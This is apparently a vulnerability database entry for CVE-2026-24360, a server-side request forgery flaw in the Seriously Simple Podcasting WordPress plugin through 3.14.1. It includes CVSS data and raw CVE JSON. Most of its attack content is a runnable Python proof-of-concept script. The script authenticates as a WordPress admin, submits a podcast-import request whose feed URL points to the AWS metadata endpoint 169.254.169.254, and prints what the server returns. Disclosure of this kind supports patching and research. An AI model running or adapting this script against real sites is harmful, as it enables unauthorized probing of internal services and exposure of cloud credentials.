Security Vulnerability Report
中文
CVE-2026-24360 CVSS 4.4 MEDIUM

CVE-2026-24360

Published: 2026-01-22 17:16:40
Last Modified: 2026-04-28 03:16:03

Description

Server-Side Request Forgery (SSRF) vulnerability in Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting allows Server Side Request Forgery.This issue affects Seriously Simple Podcasting: from n/a through <= 3.14.1.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Seriously Simple Podcasting <= 3.14.1(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24360 PoC - SSRF in Seriously Simple Podcasting # Target: WordPress site with Seriously Simple Podcasting plugin <= 3.14.1 import requests import sys from urllib.parse import quote TARGET_URL = "http://target-wordpress-site.com" # Use your WordPress admin credentials USERNAME = "admin" PASSWORD = "password" def get_wp_session(): """Authenticate and get WordPress session""" session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data, timeout=10) return session if 'wordpress_logged_in' in session.cookies.get_dict() else None def exploit_ssrf(session): """Exploit SSRF vulnerability - fetch internal metadata""" # Target internal metadata endpoint (AWS EC2 example) ssrf_target = "http://169.254.169.254/latest/meta-data/" # Plugin's feed import functionality endpoint exploit_url = f"{TARGET_URL}/wp-admin/admin.php?page=seriously-simple-podcasting-import" payload = { 'feed_url': ssrf_target, 'import_podcast': 'Import Podcast' } print(f"[*] Sending SSRF payload: {ssrf_target}") response = session.post(exploit_url, data=payload, timeout=15) if response.status_code == 200: print("[+] Request sent successfully") print(f"[*] Response length: {len(response.text)} bytes") return response.text else: print("[-] Exploitation failed") return None def main(): print("[*] CVE-2026-24360 PoC - SSRF in Seriously Simple Podcasting") print("=" * 60) session = get_wp_session() if not session: print("[-] Authentication failed") sys.exit(1) print("[+] Authenticated successfully") result = exploit_ssrf(session) if result: print("[+] SSRF vulnerability confirmed!") print(f"[*] Response preview:\n{result[:500]}...") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24360", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:39.700", "lastModified": "2026-04-28T03:16:03.307", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting allows Server Side Request Forgery.This issue affects Seriously Simple Podcasting: from n/a through <= 3.14.1."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición del lado del servidor (SSRF) en Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting permite la falsificación de petición del lado del servidor. Este problema afecta a Seriously Simple Podcasting: desde n/a hasta &lt;= 3.14.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/seriously-simple-podcasting/vulnerability/wordpress-seriously-simple-podcasting-plugin-3-14-1-server-side-request-forgery-ssrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}